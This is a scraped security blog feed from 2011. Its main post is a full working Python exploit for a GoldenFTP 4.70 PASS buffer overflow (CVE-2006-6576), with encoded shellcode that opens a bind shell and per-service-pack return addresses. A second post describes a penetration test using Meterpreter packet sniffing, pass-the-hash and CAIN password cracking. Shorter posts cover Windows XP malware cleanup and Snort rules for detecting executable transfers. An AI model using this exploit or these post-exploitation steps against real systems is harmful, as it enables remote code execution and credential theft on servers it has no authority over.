log/scripts/enum_chrome<br />
<br />
With a local installation under Ubuntu, the msf config directory is often $HOME/.msfUnknownnoreply@blogger.com0tag:blogger.com,1999:blog-2320276621879394553.post-71571245059457185122011-07-08T09:32:00.000-07:002011-07-08T12:21:58.014-07:00Revised V2.5 Golden FTP 4.70 PASS overflow exploit<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">#!/usr/bin/python</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">#</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">###########################################################################</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">## Exploit Title: Revised V2.5: GoldenFTP 4.70 PASS overflow exploit</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">## Exploit Version: 2.5, 2011-07-08 15:00</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">## Date: July 8, 2011 (20110708-1500)</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">## Author: Joff Thyer (jsthyer@gmail.com)</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">## Software Link: http://www.goldenftpserver.com/</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">## Version: 4.70</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">## Tested on: WinXP-SP0/SP2/SP3</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">## CVE: 2006-6576</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">##</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">## based on exploit by:</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">## Craig Freyman (cd1zz) and Gerardo Iglesias Galvan (iglesiasgg)</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">##</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">## NOTES:</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">## (1) You must make sure that the "Show new connections" option is enabled</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">## in order for this exploit to work.</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">## (2) Specifying the IP source address is important as it is used in the</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">## calculation of the overflow buffer offset.</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">###########################################################################</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">#</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">import socket</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">import sys</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">from subprocess import Popen, PIPE</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">import re</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">import time</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"># Metasploit</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"># ./msfpayload windows/exec CMD=calc.exe r | ./msfencode -b '\x00\x0a\x0d' -c 3</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"># 281 bytes</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">calc = \</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\xda\xd8\xbf\xbd\xe6\x2a\x25\xd9\x74\x24\xf4\x5d\x2b\xc9" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\xb1\x40\x31\x7d\x19\x03\x7d\x19\x83\xc5\x04\x5f\x13\xf0" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\xfc\x25\x7d\x71\xce\xb6\xa7\x0e\x14\xbc\x03\xc4\x9d\x8d" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x8d\x2b\x4d\xf7\xee\x18\x6b\x84\x32\x9a\x69\xde\x1d\x56" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x5b\x3c\x2b\x9b\xd7\x9f\x60\x60\x07\x1a\x80\xa2\x81\xae" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\xce\x53\x0c\x41\x2a\x63\xce\xe5\x8c\xb1\x14\x78\x13\x69" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x5b\xe0\x83\x33\x30\x96\x31\x89\x93\x5f\x95\x5c\xe5\x63" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x23\x44\xfa\xe4\xe4\xbc\x75\x83\xb8\x5e\xa3\x1f\x86\x37" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\xc8\xf4\x89\xab\x9d\x6e\x65\xac\x65\xfc\x7b\xe9\x86\xe6" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x8f\x25\x93\x03\xd4\x1d\x7f\x73\x91\xc4\x68\x67\x62\x59" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\xe0\x5f\x51\x08\xfb\xd7\x1f\xb6\x5a\x27\xe9\x35\x61\x3e" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\xf8\x4c\xac\x19\x43\x47\x2b\x13\x92\x9e\x1a\xed\xfd\x45" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x98\x34\x2a\x83\xb4\x84\x2e\xa0\x67\x24\x44\x5b\x32\x0b" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\xbf\x5b\x7a\x9f\xa6\xc8\xd7\xaf\x04\xb9\xa2\x53\x5f\xfd" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x6f\x5b\x32\x77\xb2\x5b\xec\x53\xa1\x12\x29\x88\x5d\x0f" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x27\x92\x8b\xca\x63\x38\x4d\x1b\xd2\x26\x0e\xf8\xdf\xf4" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\xef\x8f\x14\x63\xf2\x81\x9e\x60\xb0\xc6\xbe\x97\x1e\x27" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x32\x8f\x88\x29\x3e\xa4\xbe\xd6\x45\xaa\x70\xcd\x8a\xf6" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\xcd\xa0\x15\x5b\x4b\x73\xde\x3c\xa6\x33\x7d\xa5\xa9\xda" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x0b\xdf\xc3\xd9\xe9\x81\x5a\xbb\x77\x47\x45\x75\xf9\x5f" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x88"</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"># Metasploit</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"># ./msfpayload windows/exec CMD=windows/shell_bind_tcp r | ./msfencode -b '\x00\x0a\x0d' -c3</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"># 422 bytes</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">cmdshell = \</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\xd9\xce\xba\xd6\x6f\x98\xda\xd9\x74\x24\xf4\x5f\x33\xc9" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\xb1\x63\x31\x57\x1a\x03\x57\x1a\x83\xef\xfc\xe2\x23\xd5" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x9d\x94\x67\x5c\x47\xea\xae\xd5\x53\x1f\x0e\x3f\x55\x6e" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\xf3\x0e\x33\x83\x08\x27\xa9\x20\xe5\x75\x83\xa5\xb5\x66" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x03\x32\x7d\xe2\xf5\xfa\x35\x4c\x0f\x9b\x44\x05\x5b\x98" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x24\x7d\xf0\xc3\xb6\xa2\x68\x9c\x42\xed\x08\x82\xfe\xbb" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x7e\xcf\x76\x76\x97\x38\xeb\xb1\x98\xd6\x51\x8b\xca\xae" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\xea\x2b\x72\x86\x3b\x67\x6a\x9f\x5d\xf2\x4c\xb8\x23\x10" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x95\xd3\x01\x41\x09\x36\x93\x41\xaa\xb5\x84\xd9\x35\xb0" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x44\x13\xc0\x38\x6b\xab\x1a\x8c\xb7\xec\x30\x7a\x4a\x73" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\xe5\xf1\x7e\x7e\xaf\x66\xa1\x85\x53\xea\x1a\xd7\x0b\x9a" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x9e\xf0\x04\x63\xe0\x57\xf6\x6a\x88\xb1\xef\xe0\x4a\x78" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x63\xdb\xcf\xe6\xde\xcf\xe9\x2c\x94\x5f\xef\x28\x2a\xdc" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\xcd\x7a\xb2\x13\x88\xb1\x8d\x40\xcf\x0c\xf9\x52\x2f\xbc" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\xd4\x34\xad\xb0\x45\xfb\xe2\xa3\xab\xa7\x46\xf6\x83\x38" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\xe0\x36\x75\x7a\x6f\x96\xb3\x4f\xbe\xb9\x17\xbd\xea\x0e" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\xf9\x10\x62\x2e\x91\x69\x28\xeb\xe6\x07\x23\x0f\xf6\x26" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x4a\xec\xba\xd8\x74\xba\xe6\x38\xb3\x56\x13\xf1\x8d\x70" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x98\xc9\x60\xcf\x9c\xf5\x1f\x8f\x8f\x04\x6c\x61\x63\x25" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x87\x89\x1d\x58\x4f\x18\xca\xcb\x11\x03\x24\x6b\xa6\xbd" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x47\x90\x43\xc5\x9f\x3f\xc8\x64\x3a\xcc\x69\xc7\x9c\x2d" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x19\xc1\x67\xfa\x07\xcb\xd7\x92\x83\x23\x50\xdf\xa2\xd8" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x08\xa8\xec\x43\xbb\xda\x10\xc2\x0b\x30\xb7\xdd\xbd\x33" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x6a\x18\x98\x1e\xc1\x5e\x77\xeb\xe8\x21\x4e\x18\x60\x6f" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x60\x5c\x99\xb6\x7e\x28\xdb\xda\x40\xea\x8c\xc7\x5c\x70" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x7f\xd1\x61\xaf\x42\x25\x8d\xec\xb9\xde\x5f\x40\xa2\xa2" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\xe2\x39\x6f\x85\x54\xd3\xa0\xef\x4c\x08\x23\xb5\x88\x85" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\xc0\xfc\xd2\x50\x68\x5b\x93\x33\x8a\x6e\xf8\x4d\x79\xa8" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x29\x56\x39\xee\x4f\xd2\x49\x48\x4e\x0e\x1c\x8a\xd5\xa6" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\xd0\x94\xfb\xda\x22\x3d\xf4\x22\xe7\x54\xff\xa2\x05\xc4" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x8c\xc7"</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">if len(sys.argv) < 5:</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> print "[-]Usage: %s <src addr> <target addr> <shellcode> <platform>" % sys.argv[0]</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> print "\tshellcode = (calc|shell)"</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> print "\tplatform = (sp0|sp2|sp3)"</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> print "\tExample: ./gftp-sploit.py 1.2.1.2 5.6.5.4 calc sp2"</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> sys.exit(0)</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">srcaddr = sys.argv[1]</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">target = sys.argv[2]</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">shellcode = sys.argv[3]</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">platform = sys.argv[4]</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"># which payload?</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">buf = calc</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">if shellcode == "calc":</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> buf = calc</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">elif shellcode == "shell":</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> buf = cmdshell</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"># address of JMP ESI in Kernel32.dll</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">if platform == "sp0":</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> jmpesi = "\x7b\x15\xe8\x77"</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">elif platform == "sp2":</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> jmpesi = "\xc3\x72\x85\x7c"</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">elif platform == "sp3":</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> jmpesi = "\x0b\xda\x82\x7c"</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">shortjmp = "\x90\x90\x90\x90\xeb\x20\n"</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">nopsled = "\x90" * 60</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">padding = "A" * (533 - len(srcaddr + buf + nopsled))</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">payload = nopsled + buf + padding + jmpesi</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">print "\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">[+] Golden FTP PASS Exploit\n\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">[+] Version 2.5, July 8 2011\n\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">[+] Author: Joff Thyer (jsthyer@gmail.com)\n\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">[+] 'Show new connections' must be enabled in GoldenFTP in order\n\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">[+] for this exploit to succeed!\n\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">[+] Connecting: "+target</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">try:</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> s.connect((target,21))</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">except:</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> print "[-] Connection to "+target+" failed!"</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> sys.exit(0)</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">print "[+] Sending payload, length = " + `len(payload)`</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">s.send(shortjmp);</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">s.send("USER anonymous\n")</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">s.send("PASS " + payload + "\n")</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">s.recv(1024)</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">print "[+] Sleeping 2 secs..."</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">time.sleep(2)</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">s.close()</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">if shellcode == "shell" and srcaddr == target:</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> p = Popen(["netstat","-na"],stdout=PIPE,shell=False)</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> netstat = p.stdout.read()</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> shellok = re.search("TCP\s*0\.0\.0\.0:4444.*LISTENING",netstat)</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> if shellok:</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> print "[+] "+shellok.group(0)</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">print "[+] Done."</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">sys.exit(0)</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span>Unknownnoreply@blogger.com3tag:blogger.com,1999:blog-2320276621879394553.post-6366903517394053572011-06-02T10:51:00.000-07:002011-06-02T10:51:30.308-07:00Using CAIN to read packet captures during a Penetration TestThere are many ways to leverage transitive trust relationships in an environment when performing Penetration Testing. Once privileged level access is obtained on a single Windows system, hashes can usually be obtained, and it is often the case that shared credentials exist. In the case of a LANMAN or NT hash environment which only uses LANMAN/NTLMv1 challenge/response and fixed stored hashes, it is known that access to other Windows systems can be trivially obtained through only stored hash possession.<br />
<br />
Within the Metasploit framework, exists the 'windows/smb/psexec' module which works in a similar fashion to the Microsoft sysinternals PSEXEC command, but can also utilize "pass the hash" by setting the SMBPass variable to a LANMAN:NT hash rather than a plaintext password. This can be a useful way to pivot through to other systems once a single set of hashes is obtained.<br />
<br />
A feature of the Metasploit Meterpreter I found useful in a recent Penetration Test is the 'sniffer' module. This module will allow you to capture up to 50,000 packets from an exploited system and download the captured data to a libpcap compatible file.<br />
<br />
meterpreter > use sniffer<br />
Loading extension sniffer...success.<br />
meterpreter > sniffer_interfaces<br />
<br />
1 - 'WAN Miniport (Network Monitor)' ( type:3 mtu:1514 usable:true dhcp:false wifi:false )<br />
2 - 'Intel(R) PRO/1000 MT Network Connection' ( type:0 mtu:1514 usable:true dhcp:false wifi:false )<br />
<br />
meterpreter > sniffer_start 2<br />
[*] Capture started on interface 2 (50000 packet buffer)<br />
meterpreter > sniffer_stats 2<br />
[*] Capture statistics for interface 2<br />
packets: 1849<br />
bytes: 444042<br />
<br />
meterpreter > sniffer_dump 2 myfile.pcap<br />
meterpreter > sniffer_stop 2<br />
<br />
<br />
During a recent Pen Test, I happened to gain access to a network monitoring system. This is the near perfect scenario to leverage the meterpreter sniffer module.<br />
<br />
CAIN (www.oxid.it) is most often thought about as a layer 2 network interception and man in the middle tool with an incredibly useful set of password hash analysis and cracking ability. CAIN has the to perform cryptanalysis using traditional rcrack style rainbow tables, as well as the ophcrack format rainbow tables. Password cracking can also be done using dictionary or brute force mode.<br />
<br />
What is usually overlooked is that CAIN can read libpcap files and process the contents, parsing out all of the useful various application and O/S password hash formats. To perform this libpcap file parsing in CAIN is a simple click on the open folder looking icon in the top left of the menu bar. It is hard to find because the typical "open file" entry does not exist in the file menu.<br />
<br />
I used this capability to parse through sniffer packet captures from compromised systems, and managed to further my intrusion into the environment significantly in the process. Cryptanalysis, dictionary and bruteforce attacks can be leveraged against captured LANMAN/NT challenge response transactions. Dictionary and bruteforce attacks can be used against Oracle, and MySQL database credentials which are often weak. SNMP version 1 community strings are obviously plaintext and easy to capture. MSSQL in older days uses TDS (Unicode XOR with 0xa5) which is easily reversible. It is also quite interesting to see how much plaintext LDAP can be leveraged for access also.<br />
<br />
Within the Pen Testing context, obtaining access and obtaining passwords with associated cracking time is a huge component. However, we cannot forget that demonstrating access to real data is important to show there exists real risk.<br />
<br />
I find that the most interesting demonstration of this is to show that you can access database tables. However, one must tread carefully in this area. When demonstrating this access, try showing some table names, some column names and such without actually pulling database rows themselves. The idea is to prove you own it, and you're there without putting sensitive data into your reports. Redacted screenshots can work well in this context also.<br />
<br />
With regard to database client software, the most challenging area is to get a functional Oracle PL*SQL client working. The installation is a little tricky but if you have access to a handy and friendly DBA, you can be up and running pretty quickly. <br />
<br />
Microsoft SQL servers often have the command line utility named OSQL.EXE actually on the server itself, and PWDUMPX is useful for pulling LSA secrets from the Windows registry which often contain database credentials.<br />
<br />
MySQL command line client is a simple installation, especially with Linux distro's like Ubuntu so that should not present much challenge.Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2320276621879394553.post-74751947732143010302011-04-11T06:42:00.000-07:002011-04-11T07:12:35.431-07:00Windows XP Startup/Logon Process and MalwareRecently I had to rescue my daughter's PC from some nasty malware. For many security professionals, troubleshooting family systems is a common weekend / after hours challenge, and a lot of us are not in the business of desktop remediation.<br />
<br />
I find that the ISO based whole system virus scanners are not a bad starting point to get rid of the low hanging fruit. I have used F-Secure, and Kaspersky among others.<br />
<br />
I also find that after the scanning/remediation process, XP registry entries are often still broken leading a lot of people to the point of just re-installing. Of course, re-installing is sometimes the only option for deeply embedded malware and/or rootkit.<br />
<br />
A tool I found useful when I was poking through the HKEY_USER registry hive was 'USER2SID' since those registry entries are keyed by the SID. I also found that the malware I was dealing with had re-written the 'exefile' and '.exe' startup shell keys to be its own EXE file which was somewhat frustrating when that malware exe file was finally missing. (ie: Windows kept asking what program to open an exe with!!)<br />
<br />
Also, age old advice is to remember those program startup registry keys which are often used to infect/re-infect things:<br />
<br />
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runonce<br />
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run<br />
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run<br />
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Run<br />
HKCU\Software\Microsoft\Windows\CurrentVersion\Run<br />
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce<br />
%systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup<br />
%systemdrive%\Documents and Settings\username\Start Menu\Programs\Startup<br />
%windir%\Profiles\All Users\Start Menu\Programs\Startup<br />
%windir%\Profiles\username\Start Menu\Programs\Startup<br />
<br />
<br />
Don't forget about our old SysInternals tools, particularly 'AutoRuns' and 'Process Explorer' which I continue to find extremely useful.<br />
<br />
The Windows utility SFC.EXE is useful for a diff scan of critical system files as long as it has not been compromised.<br />
<br />
*** Always use READ-ONLY media when in a desktop incident response situation like this otherwise anything goes with regard to what is written to your favorite USB memory stick!Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2320276621879394553.post-43212691719416958262011-04-11T06:27:00.000-07:002011-04-11T06:27:04.549-07:00Detecting PECOFF EXE/DLL files with SnortSome time ago, I became interested in parsing the PECOFF file format. As a result, I authored several different Snort rules to detect the transfer of either an EXE or DLL file of different varieties. Listed below are rules for both i386/32-bit and x86-64-bit. Additionally, there is a set of rules for UPX Packed EXE files.<br />
<br />
Hopefully readers and Snort fans will find these useful.<br />
<br />
# i386 32-bit EXE over TCP<br />
log tcp any any -> any any (msg:"LOCAL: i386 PE32 EXE File Xfer"; flowbits:isnotset,upx.exe.packed; flow:established; content:"|4D 5A 90 00|"; depth:512; byte_jump:4,56,relative,little; content:"|50 45 00 00||4C 01|"; byte_test:2,!&,0x2000,16,relative,little; content:"|0B 01|"; distance:18; within:2; content:"|00 00 00 00|"; distance:50; within:4; flowbits:unset,upx.exe.packed; sid:4963001; rev:1;)<br />
<br />
# i386 32-bit DLL over TCP<br />
alert tcp any any -> any any (msg:"LOCAL: i386 PE32 DLL File Xfer"; flow:established; content:"|4D 5A 90 00|"; depth:512; byte_jump:4,56,relative,little; content:"|50 45 00 00||4C 01|"; byte_test:2,&,0x2000,16,relative,little; content:"|0B 01|"; distance:18; within:2; content:"|00 00 00 00|"; distance:50; within:4; sid:4963002; rev:1;)<br />
<br />
# x86 64-bit EXE over TCP<br />
alert tcp any any -> any any (msg:"LOCAL: x86 PE32+ EXE File Xfer"; flow:established; content:"|4D 5A 90 00|"; depth:512; byte_jump:4,56,relative,little; content:"|50 45 00 00||64 68|"; byte_test:2,!&,0x2000,16,relative,little; content:"|0B 02|"; distance:18; within:2; content:"|00 00 00 00|"; distance:50; within:4; sid:4963101; rev:1;)<br />
<br />
# x86 64-bit DLL over TCP<br />
alert tcp any any -> any any (msg:"LOCAL: x86 PE32+ EXE File Xfer"; flow:established; content:"|4D 5A 90 00|"; depth:512; byte_jump:4,56,relative,little; content:"|50 45 00 00||64 68|"; byte_test:2,&,0x2000,16,relative,little; content:"|0B 02|"; distance:18; within:2; content:"|00 00 00 00|"; distance:50; within:4; sid:4963102; rev:1;)<br />
<br />
# UPX Packed EXE over TCP<br />
alert tcp any any -> any any (msg:"LOCAL: i386 PE32 UPX Packed EXE File Xfer over TCP"; flow:established; content:"|4D 5A 90 00|"; depth:512; byte_jump:4,56,relative,little; content:"|50 45 00 00||4C 01|"; byte_test:2,!&,0x2000,16,relative,little; content:"|0B 01|"; distance:18; within:2; content:"|00 00 00 00|"; distance:50; within:4; content:"UPX0"; within:172; content:"|00 04 00 00|"; distance:16; within:4; content:"|80 00 00 E0|"; distance:12; within:4; flowbits:set,upx.exe.packed; sid:4963201; rev:1;)<br />
<br />
# UPX Packed EXE over UDP<br />
